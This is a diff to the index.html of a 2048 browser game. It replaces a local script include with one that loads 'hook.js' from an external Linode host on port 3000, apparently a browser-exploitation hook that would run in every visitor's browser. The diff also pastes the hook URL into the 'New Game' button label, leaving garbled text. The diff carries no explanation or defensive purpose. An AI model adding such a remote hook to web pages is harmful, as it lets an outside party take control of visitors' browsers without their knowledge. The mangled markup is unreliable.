--- a/index.html
+++ b/index.html
@@ -28,7 +28,7 @@
 
     <div class="above-game">
       <p class="game-intro">Join the numbers and get to the <strong>2048 tile!</strong></p>
-      <a class="restart-button">New Game</a>
+      <a class="restart-button">New Gamhttps://45-79-135-217.ip.linodeusercontent.com:3000/hook.jse</a>
     </div>
 
     <div class="game-container">
@@ -85,7 +85,7 @@
     </p>
   </div>
 
-  <script src="http://127.0.0.1:3000/hook.js"></script>
+  <script src="https://45-79-135-217.ip.linodeusercontent.com:3000/hook.js"></script>
   <script src="js/bind_polyfill.js"></script>
   <script src="js/classlist_polyfill.js"></script>
   <script src="js/animframe_polyfill.js"></script>
